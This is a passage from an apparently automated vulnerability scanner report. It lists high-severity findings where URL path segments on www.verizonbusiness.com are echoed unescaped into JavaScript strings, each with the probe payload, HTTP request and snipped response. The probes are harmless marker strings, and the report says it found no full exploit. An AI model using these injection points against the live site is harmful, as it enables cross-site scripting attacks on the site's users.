This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/educationa9363"%3bc0c6099cf49/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41850
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/educationa9363";c0c6099cf49/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1006. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/education/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab06a'%3bbbf745ee629 was submitted in the REST URL parameter 2. This input was echoed as ab06a';bbf745ee629 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/educationab06a'%3bbbf745ee629/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:04 GMT
Content-Type: text/html
Content-Length: 41850
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/educationab06a';bbf745ee629/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1007. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5196d"%3b541edf6cdcf was submitted in the REST URL parameter 1. This input was echoed as 5196d";541edf6cdcf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions5196d"%3b541edf6cdcf/finance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Date: Wed, 17 Nov 2010 00:36:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions5196d";541edf6cdcf/finance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.1008. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c52'%3b6ed2c2aebca was submitted in the REST URL parameter 1. This input was echoed as 38c52';6ed2c2aebca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions38c52'%3b6ed2c2aebca/finance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:25 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions38c52';6ed2c2aebca/finance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1009. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2342c'%3b032c7f41c91 was submitted in the REST URL parameter 2. This input was echoed as 2342c';032c7f41c91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/finance2342c'%3b032c7f41c91/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:49 GMT
Content-Type: text/html
Content-Length: 41848
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/finance2342c';032c7f41c91/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1010. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef9de"%3b0da596ec1ba was submitted in the REST URL parameter 2. This input was echoed as ef9de";0da596ec1ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/financeef9de"%3b0da596ec1ba/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:40 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/financeef9de";0da596ec1ba/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1011. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be18"%3b17aa8782901 was submitted in the REST URL parameter 1. This input was echoed as 5be18";17aa8782901 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions5be18"%3b17aa8782901/government/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:47 GMT
Content-Type: text/html
Content-Length: 40640
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions5be18";17aa8782901/government/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.1012. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97413'%3bc8209a7285e was submitted in the REST URL parameter 1. This input was echoed as 97413';c8209a7285e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions97413'%3bc8209a7285e/government/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40640
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions97413';c8209a7285e/government/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1013. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc2ae"%3b9366212f6b1 was submitted in the REST URL parameter 2. This input was echoed as dc2ae";9366212f6b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/governmentdc2ae"%3b9366212f6b1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/governmentdc2ae";9366212f6b1/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1014. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 443e7'%3b0289e00b028 was submitted in the REST URL parameter 2. This input was echoed as 443e7';0289e00b028 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/government443e7'%3b0289e00b028/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/government443e7';0289e00b028/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1015. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4ba1'%3bd1c24f72747 was submitted in the REST URL parameter 1. This input was echoed as d4ba1';d1c24f72747 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd4ba1'%3bd1c24f72747/healthcare/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutionsd4ba1';d1c24f72747/healthcare/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1016. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8f65"%3b7952c83781b was submitted in the REST URL parameter 1. This input was echoed as e8f65";7952c83781b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse8f65"%3b7952c83781b/healthcare/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:55 GMT
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionse8f65";7952c83781b/healthcare/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.1017. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379d4"%3b7a8626b881d was submitted in the REST URL parameter 2. This input was echoed as 379d4";7a8626b881d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/healthcare379d4"%3b7a8626b881d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/healthcare379d4";7a8626b881d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1018. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

